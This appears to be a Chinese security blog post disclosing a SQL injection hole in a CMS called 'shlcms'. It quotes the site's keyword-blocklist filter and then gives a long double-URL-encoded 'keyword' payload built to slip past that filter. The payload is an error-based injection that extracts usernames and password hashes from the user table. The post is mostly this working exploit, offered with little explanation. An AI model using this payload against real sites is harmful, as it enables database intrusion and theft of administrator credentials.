新的一年 也是自己的第16个生日,所以在今天写点自己挖的渣渣洞出来,祝自己生日快乐。 新版的shlcms [attach]2546[/attach] function checkSqlStr($string) { $string = strtolower($string); return preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|_user/i', $string); } 因为会解码 所以无视过滤的 没过滤%就好
keyword=yu%25%2527%25%36%31%25%36%45%25%36%34%25%32%38%25%37%33%25%36%35%25%36%43%255%37%34%25%32%38%25%32%41%25%32%39%25%32%43%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%30%25%36%33%25%36%46%25%37%35%25%36%45%2%25%32%38%25%36%36%25%36%43%25%36%46%25%36%46%25%37%32%25%32%38%25%37%32%25%36%31%25%36%45%25%36%34%25%32%38%25%33%30%25%32%39%25%32%41%25%33%32%25%32%39%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%35%33%25%34%35%25%34%43%25%34%35%25%34%33%25%35%34%25%32%30%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%25%32%38%25%37%35%25%37%33%25%36%35%25%37%32%25%36%45%25%36%31%25%36%44%25%36%35%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%37%30%25%37%37%25%36%34%25%32%39%25%34%36%25%35%32%25%34%46%25%34%44%25%32%30%25%37%33%25%36%38%25%36%43%25%35%46%25%37%35%25%37%33%25%36%35%25%37%32%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%37%38%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%37%25%37%32%25%36%46%25%37%35%25%37%30%25%32%30%25%36%32%25%37%39%25%32%30%25%37%38%25%32%39%25%36%31%25%32%39%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%33%31%25%33%44%25%33%31%23
密码好像是sha1 +md5 加什么什么的 反正一般破不出来就对了。 |
-
上一篇: xss基础内容之抛砖引玉篇 – 网站安全 – 自学php
下一篇: 基于AST抽象语法树的SQL注入检测 (1) – 网站安全
评论前必须登录!
立即登录